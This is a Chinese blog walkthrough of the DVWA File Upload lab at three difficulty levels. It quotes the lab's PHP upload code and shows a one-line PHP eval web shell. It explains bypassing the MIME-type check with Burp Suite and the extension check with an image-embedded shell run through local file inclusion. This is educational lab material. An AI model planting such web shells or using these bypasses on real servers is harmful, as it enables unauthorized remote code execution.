DVWA闯关File Upload

最新推荐文章于 2023-06-27 22:50:47 发布
最新推荐文章于 2023-06-27 22:50:47 发布
阅读量239 收藏
点赞数
分类专栏: DVWA 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108266934
版权

低级难度

先来看一下源代码

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>

可以看到没有对上传的文件做任何的检查、过滤,直接传一句话木马

<?php @eval($_POST['777']) ?>

在这里插入图片描述
访问上传的文件所在路径
http://192.168.40.131/DVWA-master/hackable/uploads/1.php
连接成功
在这里插入图片描述

中级难度

先来看一下源代码

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

可以看到限制了文件类型(image/jpeg或image/png)和文件大小(100000字节),那么只需要修改一下文件类型就行了【不要混淆文件类型和文件后缀名】
1:使用BurpSuite截取原始数据包
在这里插入图片描述
2:修改文件类型,并显示上传成功
在这里插入图片描述

高级难度

源代码

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];    //文件在上传者机器上的文件名
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); //上传文件的后缀名
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];   //上传文件的大小
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; //上传文件保存在服务器临时文件夹的文件名
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext )=="jpeg" || strtolower( $uploaded_ext ) == "png" ) &&( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

可以看到,主要是限制了文件后缀,那就用图片木马
在这里插入图片描述
然后你会发现,上传失败,用记事本打开2.jpg发现一句话木马写在了文件的开头
在这里插入图片描述
正确生成图片木马的姿势:
在这里插入图片描述
这个时候就需要借助文件包含漏洞了,而文件包含漏洞的高级难度模式里,限制了只能只用本地文件包含,所以我们需要提前知道自己上传的文件在哪。
在我搭建的环境里面,上传的文件在这里C:\phpstudy\WWW\DVWA-master\hackable\uploads
在这里插入图片描述
然后本地文件包含:
在这里插入图片描述
然后就可以连接蚁剑了

lainwith
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DVWA靶机通关攻略第四关——文件包含
小飞飞的博客
03-11 629
DVWA靶机的文件包含详细教学
DVWA闯关File Inclusion
LainWith的博客
08-27 210
低级难度 先来看一下源代码 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 可以看到没有做任何过滤,我们可以任意文件包含。 首先尝试包含一个不存在的文件,出现了报错,并且显示出了网站的路径 现在直接远程包含,拿下它。靶机NAT,再额外准备一台NAT电脑让二者能够互相访问。 192.168.40.131/DVWA-master/vulnerabilities/fi/?page=http://192.168.40
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1301
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWAFile Upload(文件上传漏洞)通关教程
weixin_30527551的博客
08-01 1212
日期:2019-08-01 17:28:33 更新: 作者:Bay0net 介绍: 0x01、 漏洞介绍 在渗透测试过程中,能够快速获取服务器权限的一个办法。 如果开发者对上传的内容过滤的不严,那么就会存在任意文件上传漏洞,就算不能解析,也能挂个黑页,如果被 fghk 利用的话,会造成很不好的影响。 如果上传的文件,还能够解析,或者配合文件包含漏洞,那么就能获取到服务...
dvwa文件包含_DVWA中等级通关指南-超详细版
weixin_40006763的博客
11-29 255
欢迎大家光临我的博客一起交流学习呀~http://www.chenjingjiu.cn1.Brute Force上篇文章截的图太多了,这回就不给大家截题目了,重点的图还是会有的哦~从源码可以看到,只有红框框出来的地方发生了变化。这个mysql_real_escape_string()是干什么的呢?简单来说就是对一些特殊字符进行了转义,那低等级时候用到的注入就失效了吧,这回就只能老老实实爆破了,而且...
DVWA 共12关通关笔记
09-12
基本上都过来了。
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA-master.7z 压缩包
最新发布
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
DVWA靶场搭建与使用
09-02
DVWA靶场搭建
DVWA Installation
08-15
DVWA all package. DVWA-master.zip
DVWA文件包含漏洞(File Inclusion)
qq_54537919的博客
06-27 1137
DVWA文件包含漏洞(File Inclusion)
文件包含-DVWA练习
qq_63087425的博客
10-20 1134
首先,我们需要大概知道文件包含是什么,可能会产生哪些漏洞,如何利用这些漏洞看相关文章环境:win10+phpstudy。
DVWAFile Upload
weixin_42075643的博客
02-18 249
新的一年,继续学习 ???? 今天学习文件上传,还是 DVWA上试试~~ ** low level ** 查看源码:)(这里就不贴代码了,环境里都有) 点击view source即可! 开始测试吧! 通过看代码,代码未做任何限制和过滤可以直接上传一句话木马: <?php eval($_POST[a]);?> 我这里命名为yjh.php: 显示成功之后,可以用中国蚁剑直接连接: 这里大概写一下蚁剑的基本使用方法: 打开界面,空白处右键——>添加数据——>粘贴传入的地址URL以
DVWA 文件包含
m0_73606240的博客
01-08 791
DVWA File Include
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 2800
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP的文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)
爱国小白帽
02-19 3806
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
DVWA低等级通关指南-超详细版
陈京九的个人博客
04-11 7502
欢迎各位到我的博客参观呀,大家共同学习 http://www. chenjingjiu.cn 1.Brute Force 一打开就是这种界面,因为是brute force,所以先尝试爆破 查看一下...
DVWA上传文件-中级-攻略
真正的大师,永远都怀着一颗学徒的心。
07-21 942
文章目录一、一句话木马shell.php二、利用BP修改文件属性1)通过查看源码分析出它的上传做了限制2)我们通过修改他的文件类型来达到欺骗服务器的目的3)修改后文件成功上传4)蚁jian连接。总结 一、一句话木马shell.php 二、利用BP修改文件属性 1)通过查看源码分析出它的上传做了限制 2)我们通过修改他的文件类型来达到欺骗服务器的目的 3)修改后文件成功上传 4)蚁jian连接。 成功连接。 总结 查看源码分析出过滤条件。 利用BP修改上传文件类型成功绕过。 上传成功 ...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
dvwa file inclusion和file upload
05-12
其中包括文件包含File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值